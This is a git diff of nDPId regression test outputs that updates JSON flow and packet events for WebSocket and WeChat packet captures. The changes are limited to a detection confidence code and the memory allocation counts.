00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1475155931028} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7580000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1475155931028,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1475155931028,"pkt":"AFBWwAAIAAwpij2nCABFAABB27JAAEAGhyvAqCuHwKgrATA5xzc8ilRnydSxV1AYAO1IlQAAgRdXZWxjb21lLCAxOTIuMTY4LjQzLjEgIQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7580000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7580000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1475155946892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1475155946892,"pkt":"AAwpij2nAFBWwAAICABFAAA6BcdAAEAGXR7AqCsBwKgrh8c3MDnJ1LFXPIpUgFAYP+\/mwAAAgYzhfo65lRv9zcET68qSH+nc"} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1475155946903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1475155946903,"pkt":"AFBWwAAIAAwpij2nCABFAABc27NAAEAGhw\/AqCuHwKgrATA5xzc8ilSAydSxaVAYAO0tVgAAgTIyMTozMzo1MiAoJzE5Mi4xNjguNDMuMScsIDUwOTk5KSBzYXk6IHRlc3QgbWVzc2FnZQ=="} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1475155931028,"flow_last_seen":1475156008657,"flow_idle_time":7580000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":34,"midstream":1,"thread_ts_msec":1475156008657,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1475155931028,"flow_last_seen":1475156008657,"flow_idle_time":7580000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":34,"midstream":1,"thread_ts_msec":1475156008657,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-payload-len":171,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1475156008657} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5/5 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871636 bytes -~~ total memory freed........: 5871636 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6005270 bytes +~~ total memory freed........: 6005270 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 689 chars diff --git a/test/results/wechat.pcap.out b/test/results/wechat.pcap.out index b0a915a36..f3915ada3 100644 --- a/test/results/wechat.pcap.out +++ b/test/results/wechat.pcap.out @@ -5,26 +5,26 @@ 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492167337792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167337792,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0B7NAAEAGDZLAqAFny82XotNEAbsWJbkHbCUOQoAQAk6qQAAAAQEICgAwqxZF0ZUD"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1492167338426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167338426,"pkt":"AQBeAAD7eJKcD6iOCABFAABEuMlAAAERHdXAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} -00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} +00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1492167338426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492167338426,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} -00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} +00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1492167338426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167338426,"pkt":"AQBeAAD7eJKcD6iOCABFAABEuMpAAAERHdTAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1492167338426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492167338426,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1492167339426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167339426,"pkt":"AQBeAAD7eJKcD6iOCABFAABEuN1AAAERHcHAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1492167339427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492167339427,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342857,"flow_last_seen":1492167342857,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1492167342857,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1492167342857,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1492167342857,"pkt":"8IQvSpdgeJKcD6iOCABFAABQ0QRAAEAR5OLAqAFnwKgB\/tHmADUAPEQCPBkBAAABAAAAAAAADHNhZmVicm93c2luZxFnb29nbGV1c2VyY29udGVudANjb20AAAEAAQ=="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342857,"flow_last_seen":1492167342857,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1492167342857,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342857,"flow_last_seen":1492167342857,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1492167342857,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1492167342893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1492167342893,"pkt":"eJKcD6iO8IQvSpdgCABFoAECAABAAEARtJXAqAH+wKgBZwA10eYA7qtlPBmBgAABAAIABAAEDHNhZmVicm93c2luZxFnb29nbGV1c2VyY29udGVudANjb20AAAEAAcAMAAUAAQAANssADgJzYgFsBmdvb2dsZcArwEAAAQABAAAAxwAErNkWDsBDAAIAAQAACYwABgNuczHARcBDAAIAAQAACYwABgNuczTARcBDAAIAAQAACYwABgNuczLARcBDAAIAAQAACYwABgNuczPARcBqAAEAAQABNLQABNjvIArAjgABAAEAATS0AATY7yIKwKAAAQABAAE0tAAE2O8kCsB8AAEAAQABNLQABNjvJgo="} -00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.14"}} +00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.14"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342893,"flow_last_seen":1492167342893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1492167342893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167342893,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8j4ZAAEAGJj\/AqAFnrNkWDpcBAbvnsj+XAAAAAKACchDgsAAAAgQFtAQCCAoAMLARAAAAAAEDAwc="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1492167342941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167342941,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8xIIAADIGPqOs2RYOwKgBZwG7lwHnJuhS57I\/mKASpajHRwAAAgQFZAQCCApd2bi8ADCwEQEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1492167342941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167342941,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0j4dAAEAGJkbAqAFnrNkWDpcBAbvnsj+Y5yboU4AQAOWaewAAAQEICgAwsB1d2bi8"} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167342893,"flow_last_seen":1492167342942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1492167342942,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167342893,"flow_last_seen":1492167342995,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1492167342995,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1"}} -02015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167342893,"flow_last_seen":1492167342997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4434,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1492167342997,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","server_names":"*.googleusercontent.com,*.apps.googleusercontent.com,*.appspot.com.storage.googleapis.com,*.blogspot.com,*.bp.blogspot.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.doubleclickusercontent.com,*.ggpht.com,*.googledrive.com,*.googlesyndication.com,*.googleweblight.com,*.safenup.googleusercontent.com,*.sandbox.googleusercontent.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.googleapis.com,*.storage.select.googleapis.com,blogspot.com,bp.blogspot.com,commondatastorage.googleapis.com,doubleclickusercontent.com,ggpht.com,googledrive.com,googleusercontent.com,googleweblight.com,static.panoramio.com.storage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.googleusercontent.com","alpn":"h2,http\/1.1","fingerprint":"8B:36:AF:31:A2:4C:EE:50:CC:6F:34:F7:2C:A3:C5:B6:4B:02:AC:53"}} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167342893,"flow_last_seen":1492167342942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1492167342942,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 